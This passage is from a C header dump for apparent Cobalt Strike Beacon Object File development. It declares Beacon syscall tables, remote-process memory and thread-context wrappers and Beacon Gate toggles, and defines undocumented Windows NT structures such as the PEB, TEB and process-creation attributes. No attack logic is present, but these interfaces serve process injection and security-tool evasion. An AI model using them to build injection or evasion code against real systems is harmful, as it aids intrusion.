SYSCALL_API_ENTRY ntSetContextThread; 288 | SYSCALL_API_ENTRY ntResumeThread; 289 | SYSCALL_API_ENTRY ntCreateThreadEx; 290 | SYSCALL_API_ENTRY ntOpenProcess; 291 | SYSCALL_API_ENTRY ntOpenThread; 292 | SYSCALL_API_ENTRY ntClose; 293 | SYSCALL_API_ENTRY ntCreateSection; 294 | SYSCALL_API_ENTRY ntMapViewOfSection; 295 | SYSCALL_API_ENTRY ntUnmapViewOfSection; 296 | SYSCALL_API_ENTRY ntQueryVirtualMemory; 297 | SYSCALL_API_ENTRY ntDuplicateObject; 298 | SYSCALL_API_ENTRY ntReadVirtualMemory; 299 | SYSCALL_API_ENTRY ntWriteVirtualMemory; 300 | SYSCALL_API_ENTRY ntReadFile; 301 | SYSCALL_API_ENTRY ntWriteFile; 302 | SYSCALL_API_ENTRY ntCreateFile; 303 | } SYSCALL_API, *PSYSCALL_API; 304 | 305 | /* Additional Run Time Library (RTL) addresses used to support system calls. 306 | * If they are not set then system calls that require them will fall back 307 | * to the Standard Windows API. 
308 | * 309 | * Required to support the following system calls: 310 | * ntCreateFile 311 | */ 312 | typedef struct 313 | { 314 | PVOID rtlDosPathNameToNtPathNameUWithStatusAddr; 315 | PVOID rtlFreeHeapAddr; 316 | PVOID rtlGetProcessHeapAddr; 317 | } RTL_API, *PRTL_API; 318 | 319 | typedef struct 320 | { 321 | PSYSCALL_API syscalls; 322 | PRTL_API rtls; 323 | } BEACON_SYSCALLS, *PBEACON_SYSCALLS; 324 | 325 | DECLSPEC_IMPORT BOOL BeaconGetSyscallInformation(PBEACON_SYSCALLS info, BOOL resolveIfNotInitialized); 326 | 327 | /* Beacon System call functions which will use the current system call method */ 328 | DECLSPEC_IMPORT LPVOID BeaconVirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect); 329 | DECLSPEC_IMPORT LPVOID BeaconVirtualAllocEx(HANDLE processHandle, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect); 330 | DECLSPEC_IMPORT BOOL BeaconVirtualProtect(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect); 331 | DECLSPEC_IMPORT BOOL BeaconVirtualProtectEx(HANDLE processHandle, LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect); 332 | DECLSPEC_IMPORT BOOL BeaconVirtualFree(LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType); 333 | DECLSPEC_IMPORT BOOL BeaconGetThreadContext(HANDLE threadHandle, PCONTEXT threadContext); 334 | DECLSPEC_IMPORT BOOL BeaconSetThreadContext(HANDLE threadHandle, PCONTEXT threadContext); 335 | DECLSPEC_IMPORT DWORD BeaconResumeThread(HANDLE threadHandle); 336 | DECLSPEC_IMPORT HANDLE BeaconOpenProcess(DWORD desiredAccess, BOOL inheritHandle, DWORD processId); 337 | DECLSPEC_IMPORT HANDLE BeaconOpenThread(DWORD desiredAccess, BOOL inheritHandle, DWORD threadId); 338 | DECLSPEC_IMPORT BOOL BeaconCloseHandle(HANDLE object); 339 | DECLSPEC_IMPORT BOOL BeaconUnmapViewOfFile(LPCVOID baseAddress); 340 | DECLSPEC_IMPORT SIZE_T BeaconVirtualQuery(LPCVOID address, PMEMORY_BASIC_INFORMATION buffer, SIZE_T length); 341 | DECLSPEC_IMPORT BOOL 
BeaconDuplicateHandle(HANDLE hSourceProcessHandle, HANDLE hSourceHandle, HANDLE hTargetProcessHandle, LPHANDLE lpTargetHandle, DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwOptions); 342 | DECLSPEC_IMPORT BOOL BeaconReadProcessMemory(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead); 343 | DECLSPEC_IMPORT BOOL BeaconWriteProcessMemory(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten); 344 | 345 | /* Beacon Gate APIs */ 346 | DECLSPEC_IMPORT VOID BeaconDisableBeaconGate(); 347 | DECLSPEC_IMPORT VOID BeaconEnableBeaconGate(); 348 | 349 | /* Beacon User Data 350 | * 351 | * version format: 0xMMmmPP, where MM = Major, mm = Minor, and PP = Patch 352 | * e.g. 0x040900 -> CS 4.9 353 | * 0x041000 -> CS 4.10 354 | */ 355 | 356 | #define DLL_BEACON_USER_DATA 0x0d 357 | #define BEACON_USER_DATA_CUSTOM_SIZE 32 358 | typedef struct 359 | { 360 | unsigned int version; 361 | PSYSCALL_API syscalls; 362 | char custom[BEACON_USER_DATA_CUSTOM_SIZE]; 363 | PRTL_API rtls; 364 | PALLOCATED_MEMORY allocatedMemory; 365 | } USER_DATA, * PUSER_DATA; 366 | 367 | #ifdef __cplusplus 368 | } 369 | #endif // __cplusplus 370 | #endif // _BEACON_H_ 371 | -------------------------------------------------------------------------------- /include/Structs.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #ifndef STRUCTS_H 3 | #define STRUCTS_H 4 | 5 | #include 6 | 7 | #define STATUS_SUCCESS 0x00000000 8 | #define NtCurrentProcess() ( (HANDLE)-1 ) 9 | #define NtCurrentThread() ( (HANDLE)-2 ) 10 | #define NT_SUCCESS(STATUS) (((NTSTATUS)(STATUS)) >= STATUS_SUCCESS) 11 | 12 | typedef struct _LSA_UNICODE_STRING { 13 | USHORT Length; 14 | USHORT MaximumLength; 15 | PWSTR Buffer; 16 | } LSA_UNICODE_STRING, * PLSA_UNICODE_STRING, UNICODE_STRING, * PUNICODE_STRING, * PUNICODE_STR; 17 | 18 | 19 | #define InitializeObjectAttributes( p, n, a, r, s ) { \ 
20 | (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \ 21 | (p)->RootDirectory = r; \ 22 | (p)->Attributes = a; \ 23 | (p)->ObjectName = n; \ 24 | (p)->SecurityDescriptor = s; \ 25 | (p)->SecurityQualityOfService = NULL; \ 26 | } 27 | 28 | #define OBJ_INHERIT 0x00000002L 29 | #define OBJ_PERMANENT 0x00000010L 30 | #define OBJ_EXCLUSIVE 0x00000020L 31 | #define OBJ_CASE_INSENSITIVE 0x00000040L 32 | #define OBJ_OPENIF 0x00000080L 33 | #define OBJ_OPENLINK 0x00000100L 34 | #define OBJ_KERNEL_HANDLE 0x00000200L 35 | #define OBJ_FORCE_ACCESS_CHECK 0x00000400L 36 | #define OBJ_IGNORE_IMPERSONATED_DEVICEMAP 0x00000800L 37 | #define OBJ_DONT_REPARSE 0x00001000L 38 | #define OBJ_VALID_ATTRIBUTES 0x00001FF2L 39 | 40 | typedef struct _BASE_RELOCATION_ENTRY { 41 | WORD Offset : 12; 42 | WORD Type : 4; 43 | } BASE_RELOCATION_ENTRY, * PBASE_RELOCATION_ENTRY; 44 | 45 | 46 | typedef enum _SECTION_INHERIT { 47 | ViewShare = 1, 48 | ViewUnmap = 2 49 | } SECTION_INHERIT, * PSECTION_INHERIT; 50 | 51 | 52 | #define RTL_MAX_DRIVE_LETTERS 32 53 | 54 | 55 | 56 | typedef struct _RTL_DRIVE_LETTER_CURDIR 57 | { 58 | USHORT Flags; 59 | USHORT Length; 60 | ULONG TimeStamp; 61 | UNICODE_STRING DosPath; 62 | 63 | } RTL_DRIVE_LETTER_CURDIR, * PRTL_DRIVE_LETTER_CURDIR; 64 | 65 | typedef struct _CURDIR 66 | { 67 | UNICODE_STRING DosPath; 68 | HANDLE Handle; 69 | 70 | } CURDIR, * PCURDIR; 71 | 72 | 73 | typedef struct _RTL_USER_PROCESS_PARAMETERS 74 | { 75 | ULONG MaximumLength; 76 | ULONG Length; 77 | 78 | ULONG Flags; 79 | ULONG DebugFlags; 80 | 81 | HANDLE ConsoleHandle; 82 | ULONG ConsoleFlags; 83 | HANDLE StandardInput; 84 | HANDLE StandardOutput; 85 | HANDLE StandardError; 86 | 87 | CURDIR CurrentDirectory; 88 | UNICODE_STRING DllPath; 89 | UNICODE_STRING ImagePathName; 90 | UNICODE_STRING CommandLine; 91 | PWCHAR Environment; 92 | 93 | ULONG StartingX; 94 | ULONG StartingY; 95 | ULONG CountX; 96 | ULONG CountY; 97 | ULONG CountCharsX; 98 | ULONG CountCharsY; 99 | ULONG FillAttribute; 100 | 101 | 
ULONG WindowFlags; 102 | ULONG ShowWindowFlags; 103 | UNICODE_STRING WindowTitle; 104 | UNICODE_STRING DesktopInfo; 105 | UNICODE_STRING ShellInfo; 106 | UNICODE_STRING RuntimeData; 107 | RTL_DRIVE_LETTER_CURDIR CurrentDirectories[RTL_MAX_DRIVE_LETTERS]; 108 | 109 | ULONG_PTR EnvironmentSize; 110 | ULONG_PTR EnvironmentVersion; 111 | PVOID PackageDependencyData; 112 | ULONG ProcessGroupId; 113 | ULONG LoaderThreads; 114 | 115 | } RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS; 116 | 117 | typedef struct _LDR_MODULE { 118 | LIST_ENTRY InLoadOrderModuleList; 119 | LIST_ENTRY InMemoryOrderModuleList; 120 | LIST_ENTRY InInitializationOrderModuleList; 121 | PVOID BaseAddress; 122 | PVOID EntryPoint; 123 | ULONG SizeOfImage; 124 | UNICODE_STRING FullDllName; 125 | UNICODE_STRING BaseDllName; 126 | ULONG Flags; 127 | SHORT LoadCount; 128 | SHORT TlsIndex; 129 | LIST_ENTRY HashTableEntry; 130 | ULONG TimeDateStamp; 131 | } LDR_MODULE, * PLDR_MODULE; 132 | 133 | typedef struct _PEB_LDR_DATA { 134 | ULONG Length; 135 | ULONG Initialized; 136 | PVOID SsHandle; 137 | LIST_ENTRY InLoadOrderModuleList; 138 | LIST_ENTRY InMemoryOrderModuleList; 139 | LIST_ENTRY InInitializationOrderModuleList; 140 | } PEB_LDR_DATA, * PPEB_LDR_DATA; 141 | 142 | typedef struct _PEB { 143 | BOOLEAN InheritedAddressSpace; 144 | BOOLEAN ReadImageFileExecOptions; 145 | BOOLEAN BeingDebugged; 146 | BOOLEAN Spare; 147 | HANDLE Mutant; 148 | PVOID ImageBase; 149 | PPEB_LDR_DATA LoaderData; 150 | PRTL_USER_PROCESS_PARAMETERS ProcessParameters; 151 | PVOID SubSystemData; 152 | PVOID ProcessHeap; 153 | PVOID FastPebLock; 154 | PVOID FastPebLockRoutine; 155 | PVOID FastPebUnlockRoutine; 156 | ULONG EnvironmentUpdateCount; 157 | PVOID* KernelCallbackTable; 158 | PVOID EventLogSection; 159 | PVOID EventLog; 160 | PVOID FreeList; 161 | ULONG TlsExpansionCounter; 162 | PVOID TlsBitmap; 163 | ULONG TlsBitmapBits[0x2]; 164 | PVOID ReadOnlySharedMemoryBase; 165 | PVOID ReadOnlySharedMemoryHeap; 166 | 
PVOID* ReadOnlyStaticServerData; 167 | PVOID AnsiCodePageData; 168 | PVOID OemCodePageData; 169 | PVOID UnicodeCaseTableData; 170 | ULONG NumberOfProcessors; 171 | ULONG NtGlobalFlag; 172 | BYTE Spare2[0x4]; 173 | LARGE_INTEGER CriticalSectionTimeout; 174 | ULONG HeapSegmentReserve; 175 | ULONG HeapSegmentCommit; 176 | ULONG HeapDeCommitTotalFreeThreshold; 177 | ULONG HeapDeCommitFreeBlockThreshold; 178 | ULONG NumberOfHeaps; 179 | ULONG MaximumNumberOfHeaps; 180 | PVOID** ProcessHeaps; 181 | PVOID GdiSharedHandleTable; 182 | PVOID ProcessStarterHelper; 183 | PVOID GdiDCAttributeList; 184 | PVOID LoaderLock; 185 | ULONG OSMajorVersion; 186 | ULONG OSMinorVersion; 187 | ULONG OSBuildNumber; 188 | ULONG OSPlatformId; 189 | ULONG ImageSubSystem; 190 | ULONG ImageSubSystemMajorVersion; 191 | ULONG ImageSubSystemMinorVersion; 192 | ULONG GdiHandleBuffer[0x22]; 193 | ULONG PostProcessInitRoutine; 194 | ULONG TlsExpansionBitmap; 195 | BYTE TlsExpansionBitmapBits[0x80]; 196 | ULONG SessionId; 197 | } PEB, * PPEB; 198 | 199 | typedef struct __CLIENT_ID { 200 | HANDLE UniqueProcess; 201 | HANDLE UniqueThread; 202 | } CLIENT_ID, * PCLIENT_ID; 203 | 204 | typedef struct _TEB_ACTIVE_FRAME_CONTEXT { 205 | ULONG Flags; 206 | PCHAR FrameName; 207 | } TEB_ACTIVE_FRAME_CONTEXT, * PTEB_ACTIVE_FRAME_CONTEXT; 208 | 209 | typedef struct _TEB_ACTIVE_FRAME { 210 | ULONG Flags; 211 | struct _TEB_ACTIVE_FRAME* Previous; 212 | PTEB_ACTIVE_FRAME_CONTEXT Context; 213 | } TEB_ACTIVE_FRAME, * PTEB_ACTIVE_FRAME; 214 | 215 | typedef struct _GDI_TEB_BATCH { 216 | ULONG Offset; 217 | ULONG HDC; 218 | ULONG Buffer[310]; 219 | } GDI_TEB_BATCH, * PGDI_TEB_BATCH; 220 | 221 | typedef PVOID PACTIVATION_CONTEXT; 222 | 223 | typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME { 224 | struct __RTL_ACTIVATION_CONTEXT_STACK_FRAME* Previous; 225 | PACTIVATION_CONTEXT ActivationContext; 226 | ULONG Flags; 227 | } RTL_ACTIVATION_CONTEXT_STACK_FRAME, * PRTL_ACTIVATION_CONTEXT_STACK_FRAME; 228 | 229 | typedef struct 
_ACTIVATION_CONTEXT_STACK { 230 | PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame; 231 | LIST_ENTRY FrameListCache; 232 | ULONG Flags; 233 | ULONG NextCookieSequenceNumber; 234 | ULONG StackId; 235 | } ACTIVATION_CONTEXT_STACK, * PACTIVATION_CONTEXT_STACK; 236 | 237 | typedef struct _TEB { 238 | NT_TIB NtTib; 239 | PVOID EnvironmentPointer; 240 | CLIENT_ID ClientId; 241 | PVOID ActiveRpcHandle; 242 | PVOID ThreadLocalStoragePointer; 243 | PPEB ProcessEnvironmentBlock; 244 | ULONG LastErrorValue; 245 | ULONG CountOfOwnedCriticalSections; 246 | PVOID CsrClientThread; 247 | PVOID Win32ThreadInfo; 248 | ULONG User32Reserved[26]; 249 | ULONG UserReserved[5]; 250 | PVOID WOW32Reserved; 251 | LCID CurrentLocale; 252 | ULONG FpSoftwareStatusRegister; 253 | PVOID SystemReserved1[54]; 254 | LONG ExceptionCode; 255 | #if (NTDDI_VERSION >= NTDDI_LONGHORN) 256 | PACTIVATION_CONTEXT_STACK* ActivationContextStackPointer; 257 | UCHAR SpareBytes1[0x30 - 3 * sizeof(PVOID)]; 258 | ULONG TxFsContext; 259 | #elif (NTDDI_VERSION >= NTDDI_WS03) 260 | PACTIVATION_CONTEXT_STACK ActivationContextStackPointer; 261 | UCHAR SpareBytes1[0x34 - 3 * sizeof(PVOID)]; 262 | #else 263 | ACTIVATION_CONTEXT_STACK ActivationContextStack; 264 | UCHAR SpareBytes1[24]; 265 | #endif 266 | GDI_TEB_BATCH GdiTebBatch; 267 | CLIENT_ID RealClientId; 268 | PVOID GdiCachedProcessHandle; 269 | ULONG GdiClientPID; 270 | ULONG GdiClientTID; 271 | PVOID GdiThreadLocalInfo; 272 | PSIZE_T Win32ClientInfo[62]; 273 | PVOID glDispatchTable[233]; 274 | PSIZE_T glReserved1[29]; 275 | PVOID glReserved2; 276 | PVOID glSectionInfo; 277 | PVOID glSection; 278 | PVOID glTable; 279 | PVOID glCurrentRC; 280 | PVOID glContext; 281 | NTSTATUS LastStatusValue; 282 | UNICODE_STRING StaticUnicodeString; 283 | WCHAR StaticUnicodeBuffer[261]; 284 | PVOID DeallocationStack; 285 | PVOID TlsSlots[64]; 286 | LIST_ENTRY TlsLinks; 287 | PVOID Vdm; 288 | PVOID ReservedForNtRpc; 289 | PVOID DbgSsReserved[2]; 290 | #if (NTDDI_VERSION >= 
NTDDI_WS03) 291 | ULONG HardErrorMode; 292 | #else 293 | ULONG HardErrorsAreDisabled; 294 | #endif 295 | #if (NTDDI_VERSION >= NTDDI_LONGHORN) 296 | PVOID Instrumentation[13 - sizeof(GUID) / sizeof(PVOID)]; 297 | GUID ActivityId; 298 | PVOID SubProcessTag; 299 | PVOID EtwLocalData; 300 | PVOID EtwTraceData; 301 | #elif (NTDDI_VERSION >= NTDDI_WS03) 302 | PVOID Instrumentation[14]; 303 | PVOID SubProcessTag; 304 | PVOID EtwLocalData; 305 | #else 306 | PVOID Instrumentation[16]; 307 | #endif 308 | PVOID WinSockData; 309 | ULONG GdiBatchCount; 310 | #if (NTDDI_VERSION >= NTDDI_LONGHORN) 311 | BOOLEAN SpareBool0; 312 | BOOLEAN SpareBool1; 313 | BOOLEAN SpareBool2; 314 | #else 315 | BOOLEAN InDbgPrint; 316 | BOOLEAN FreeStackOnTermination; 317 | BOOLEAN HasFiberData; 318 | #endif 319 | UCHAR IdealProcessor; 320 | #if (NTDDI_VERSION >= NTDDI_WS03) 321 | ULONG GuaranteedStackBytes; 322 | #else 323 | ULONG Spare3; 324 | #endif 325 | PVOID ReservedForPerf; 326 | PVOID ReservedForOle; 327 | ULONG WaitingOnLoaderLock; 328 | #if (NTDDI_VERSION >= NTDDI_LONGHORN) 329 | PVOID SavedPriorityState; 330 | ULONG_PTR SoftPatchPtr1; 331 | ULONG_PTR ThreadPoolData; 332 | #elif (NTDDI_VERSION >= NTDDI_WS03) 333 | ULONG_PTR SparePointer1; 334 | ULONG_PTR SoftPatchPtr1; 335 | ULONG_PTR SoftPatchPtr2; 336 | #else 337 | Wx86ThreadState Wx86Thread; 338 | #endif 339 | PVOID* TlsExpansionSlots; 340 | #if defined(_WIN64) && !defined(EXPLICIT_32BIT) 341 | PVOID DeallocationBStore; 342 | PVOID BStoreLimit; 343 | #endif 344 | ULONG ImpersonationLocale; 345 | ULONG IsImpersonating; 346 | PVOID NlsCache; 347 | PVOID pShimData; 348 | ULONG HeapVirtualAffinity; 349 | HANDLE CurrentTransactionHandle; 350 | PTEB_ACTIVE_FRAME ActiveFrame; 351 | #if (NTDDI_VERSION >= NTDDI_WS03) 352 | PVOID FlsData; 353 | #endif 354 | #if (NTDDI_VERSION >= NTDDI_LONGHORN) 355 | PVOID PreferredLangauges; 356 | PVOID UserPrefLanguages; 357 | PVOID MergedPrefLanguages; 358 | ULONG MuiImpersonation; 359 | union 360 | { 361 | 
struct 362 | { 363 | USHORT SpareCrossTebFlags : 16; 364 | }; 365 | USHORT CrossTebFlags; 366 | }; 367 | union 368 | { 369 | struct 370 | { 371 | USHORT DbgSafeThunkCall : 1; 372 | USHORT DbgInDebugPrint : 1; 373 | USHORT DbgHasFiberData : 1; 374 | USHORT DbgSkipThreadAttach : 1; 375 | USHORT DbgWerInShipAssertCode : 1; 376 | USHORT DbgIssuedInitialBp : 1; 377 | USHORT DbgClonedThread : 1; 378 | USHORT SpareSameTebBits : 9; 379 | }; 380 | USHORT SameTebFlags; 381 | }; 382 | PVOID TxnScopeEntercallback; 383 | PVOID TxnScopeExitCAllback; 384 | PVOID TxnScopeContext; 385 | ULONG LockCount; 386 | ULONG ProcessRundown; 387 | ULONG64 LastSwitchTime; 388 | ULONG64 TotalSwitchOutTime; 389 | LARGE_INTEGER WaitReasonBitMap; 390 | #else 391 | BOOLEAN SafeThunkCall; 392 | BOOLEAN BooleanSpare[3]; 393 | #endif 394 | } TEB, * PTEB; 395 | 396 | typedef struct _LDR_DATA_TABLE_ENTRY { 397 | LIST_ENTRY InLoadOrderLinks; 398 | LIST_ENTRY InMemoryOrderLinks; 399 | LIST_ENTRY InInitializationOrderLinks; 400 | PVOID DllBase; 401 | PVOID EntryPoint; 402 | ULONG SizeOfImage; 403 | UNICODE_STRING FullDllName; 404 | UNICODE_STRING BaseDllName; 405 | ULONG Flags; 406 | WORD LoadCount; 407 | WORD TlsIndex; 408 | union { 409 | LIST_ENTRY HashLinks; 410 | struct { 411 | PVOID SectionPointer; 412 | ULONG CheckSum; 413 | }; 414 | }; 415 | union { 416 | ULONG TimeDateStamp; 417 | PVOID LoadedImports; 418 | }; 419 | PACTIVATION_CONTEXT EntryPointActivationContext; 420 | PVOID PatchInformation; 421 | LIST_ENTRY ForwarderLinks; 422 | LIST_ENTRY ServiceTagLinks; 423 | LIST_ENTRY StaticLinks; 424 | } LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY; 425 | 426 | 427 | typedef struct _INITIAL_TEB { 428 | PVOID StackBase; 429 | PVOID StackLimit; 430 | PVOID StackCommit; 431 | PVOID StackCommitMax; 432 | PVOID StackReserved; 433 | } INITIAL_TEB, * PINITIAL_TEB; 434 | 435 | typedef struct _OBJECT_ATTRIBUTES { 436 | ULONG Length; 437 | HANDLE RootDirectory; 438 | PUNICODE_STRING ObjectName; 439 | ULONG 
Attributes; 440 | PVOID SecurityDescriptor; 441 | PVOID SecurityQualityOfService; 442 | } OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES; 443 | 444 | 445 | 446 | 447 | typedef enum _PS_CREATE_STATE 448 | { 449 | PsCreateInitialState, 450 | PsCreateFailOnFileOpen, 451 | PsCreateFailOnSectionCreate, 452 | PsCreateFailExeFormat, 453 | PsCreateFailMachineMismatch, 454 | PsCreateFailExeName, 455 | PsCreateSuccess, 456 | PsCreateMaximumStates 457 | 458 | } PS_CREATE_STATE; 459 | 460 | typedef struct _PS_CREATE_INFO 461 | { 462 | SIZE_T Size; 463 | PS_CREATE_STATE State; 464 | union 465 | { 466 | struct 467 | { 468 | union 469 | { 470 | ULONG InitFlags; 471 | struct 472 | { 473 | UCHAR WriteOutputOnExit : 1; 474 | UCHAR DetectManifest : 1; 475 | UCHAR IFEOSkipDebugger : 1; 476 | UCHAR IFEODoNotPropagateKeyState : 1; 477 | UCHAR SpareBits1 : 4; 478 | UCHAR SpareBits2 : 8; 479 | USHORT ProhibitedImageCharacteristics : 16; 480 | } s1; 481 | } u1; 482 | ACCESS_MASK AdditionalFileAccess; 483 | } InitState; 484 | 485 | struct 486 | { 487 | HANDLE FileHandle; 488 | } FailSection; 489 | 490 | struct 491 | { 492 | USHORT DllCharacteristics; 493 | } ExeFormat; 494 | 495 | struct 496 | { 497 | HANDLE IFEOKey; 498 | } ExeName; 499 | 500 | struct 501 | { 502 | union 503 | { 504 | ULONG OutputFlags; 505 | struct 506 | { 507 | UCHAR ProtectedProcess : 1; 508 | UCHAR AddressSpaceOverride : 1; 509 | UCHAR DevOverrideEnabled : 1; 510 | UCHAR ManifestDetected : 1; 511 | UCHAR ProtectedProcessLight : 1; 512 | UCHAR SpareBits1 : 3; 513 | UCHAR SpareBits2 : 8; 514 | USHORT SpareBits3 : 16; 515 | } s2; 516 | } u2; 517 | HANDLE FileHandle; 518 | HANDLE SectionHandle; 519 | ULONGLONG UserProcessParametersNative; 520 | ULONG UserProcessParametersWow64; 521 | ULONG CurrentParameterFlags; 522 | ULONGLONG PebAddressNative; 523 | ULONG PebAddressWow64; 524 | ULONGLONG ManifestAddress; 525 | ULONG ManifestSize; 526 | } SuccessState; 527 | }; 528 | 529 | } PS_CREATE_INFO, * PPS_CREATE_INFO; 530 | 531 | 532 | 
// One entry of a process/thread creation attribute list.
// Attribute : attribute identifier; presumably one of the PS_ATTRIBUTE_*
//             values built with PsAttributeValue() below - confirm against the caller.
// Size      : size field for the attribute data (units not shown here; presumably bytes).
// Value / ValuePtr : anonymous union, so both names refer to the same storage;
//             which one is meaningful depends on the attribute.
// ReturnLength : optional pointer to a SIZE_T; presumably filled in for
//             output attributes - confirm.
typedef struct _PS_ATTRIBUTE
{
    ULONG_PTR Attribute;
    SIZE_T Size;
    union
    {
        ULONG_PTR Value;
        PVOID ValuePtr;
    };
    PSIZE_T ReturnLength;

} PS_ATTRIBUTE, * PPS_ATTRIBUTE;



// Attribute list header followed by a fixed array of entries.
// NOTE(review): the capacity is hard-coded to 3 entries. Code that fills this
// structure must never index past Attributes[2], and TotalLength presumably
// has to describe only the entries actually used - confirm at every call site.
typedef struct _PS_ATTRIBUTE_LIST
{
    SIZE_T TotalLength;
    PS_ATTRIBUTE Attributes[3];

} PS_ATTRIBUTE_LIST, * PPS_ATTRIBUTE_LIST;




// Encoding of a PS_ATTRIBUTE identifier: the low 16 bits carry the
// PS_ATTRIBUTE_NUM value, the three bits above them are flags.
#define PS_ATTRIBUTE_NUMBER_MASK 0x0000ffff
#define PS_ATTRIBUTE_THREAD 0x00010000 // Attribute may be used with thread creation
#define PS_ATTRIBUTE_INPUT 0x00020000 // Attribute is input only
#define PS_ATTRIBUTE_ADDITIVE 0x00040000 // Attribute may be "accumulated", e.g. bitmasks, counters, etc.

// Attribute numbers. The enumerators carry no explicit values, so they are
// numbered from 0 in declaration order; PsAttributeValue() encodes that
// number, which means entries must not be reordered or removed.
// The trailing comments give the direction (in/out) and the expected data type.
typedef enum _PS_ATTRIBUTE_NUM
{
    PsAttributeParentProcess, // in HANDLE
    PsAttributeDebugPort, // in HANDLE
    PsAttributeToken, // in HANDLE
    PsAttributeClientId, // out PCLIENT_ID
    PsAttributeTebAddress, // out PTEB
    PsAttributeImageName, // in PWSTR
    PsAttributeImageInfo, // out PSECTION_IMAGE_INFORMATION
    PsAttributeMemoryReserve, // in PPS_MEMORY_RESERVE
    PsAttributePriorityClass, // in UCHAR
    PsAttributeErrorMode, // in ULONG
    PsAttributeStdHandleInfo, // in PPS_STD_HANDLE_INFO
    PsAttributeHandleList, // in PHANDLE
    PsAttributeGroupAffinity, // in PGROUP_AFFINITY
    PsAttributePreferredNode, // in PUSHORT
    PsAttributeIdealProcessor, // in PPROCESSOR_NUMBER
    PsAttributeUmsThread, // see MSDN UpdateProceThreadAttributeList (CreateProcessW) - in PUMS_CREATE_THREAD_ATTRIBUTES
    PsAttributeMitigationOptions, // in UCHAR
    PsAttributeProtectionLevel, // in ULONG
    PsAttributeSecureProcess, // since THRESHOLD (Virtual Secure Mode, Device Guard)
    PsAttributeJobList,
    PsAttributeChildProcessPolicy, // since THRESHOLD2
    PsAttributeAllApplicationPackagesPolicy, // since REDSTONE
    PsAttributeWin32kFilter,
    PsAttributeSafeOpenPromptOriginClaim,
    PsAttributeBnoIsolation,
    PsAttributeDesktopAppPolicy,
    PsAttributeMax
} PS_ATTRIBUTE_NUM;


// Build an attribute identifier: Number is masked to the low 16 bits and each
// of Thread / Input / Additive, when non-zero, sets the matching flag bit.
// Every argument is parenthesised, so expressions are safe to pass.
#define PsAttributeValue(Number, Thread, Input, Additive) \
    (((Number) & PS_ATTRIBUTE_NUMBER_MASK) | \
    ((Thread) ? PS_ATTRIBUTE_THREAD : 0) | \
    ((Input) ? PS_ATTRIBUTE_INPUT : 0) | \
    ((Additive) ? PS_ATTRIBUTE_ADDITIVE : 0))

// Ready-made identifiers, one per PS_ATTRIBUTE_NUM entry.
// The three booleans are (Thread, Input, Additive) in that order.
#define PS_ATTRIBUTE_PARENT_PROCESS \
    PsAttributeValue(PsAttributeParentProcess, FALSE, TRUE, TRUE)
#define PS_ATTRIBUTE_DEBUG_PORT \
    PsAttributeValue(PsAttributeDebugPort, FALSE, TRUE, TRUE)
#define PS_ATTRIBUTE_TOKEN \
    PsAttributeValue(PsAttributeToken, FALSE, TRUE, TRUE)
#define PS_ATTRIBUTE_CLIENT_ID \
    PsAttributeValue(PsAttributeClientId, TRUE, FALSE, FALSE)
#define PS_ATTRIBUTE_TEB_ADDRESS \
    PsAttributeValue(PsAttributeTebAddress, TRUE, FALSE, FALSE)
#define PS_ATTRIBUTE_IMAGE_NAME \
    PsAttributeValue(PsAttributeImageName, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_IMAGE_INFO \
    PsAttributeValue(PsAttributeImageInfo, FALSE, FALSE, FALSE)
#define PS_ATTRIBUTE_MEMORY_RESERVE \
    PsAttributeValue(PsAttributeMemoryReserve, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_PRIORITY_CLASS \
    PsAttributeValue(PsAttributePriorityClass, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_ERROR_MODE \
    PsAttributeValue(PsAttributeErrorMode, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_STD_HANDLE_INFO \
    PsAttributeValue(PsAttributeStdHandleInfo, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_HANDLE_LIST \
    PsAttributeValue(PsAttributeHandleList, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_GROUP_AFFINITY \
    PsAttributeValue(PsAttributeGroupAffinity, TRUE, TRUE, FALSE)
#define PS_ATTRIBUTE_PREFERRED_NODE \
    PsAttributeValue(PsAttributePreferredNode, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_IDEAL_PROCESSOR \
    PsAttributeValue(PsAttributeIdealProcessor, TRUE, TRUE, FALSE)
#define PS_ATTRIBUTE_MITIGATION_OPTIONS \
    PsAttributeValue(PsAttributeMitigationOptions, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_PROTECTION_LEVEL \
    PsAttributeValue(PsAttributeProtectionLevel, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_UMS_THREAD \
    PsAttributeValue(PsAttributeUmsThread, TRUE, TRUE, FALSE)
#define PS_ATTRIBUTE_SECURE_PROCESS \
    PsAttributeValue(PsAttributeSecureProcess, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_JOB_LIST \
    PsAttributeValue(PsAttributeJobList, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_CHILD_PROCESS_POLICY \
    PsAttributeValue(PsAttributeChildProcessPolicy, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_ALL_APPLICATION_PACKAGES_POLICY \
    PsAttributeValue(PsAttributeAllApplicationPackagesPolicy, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_WIN32K_FILTER \
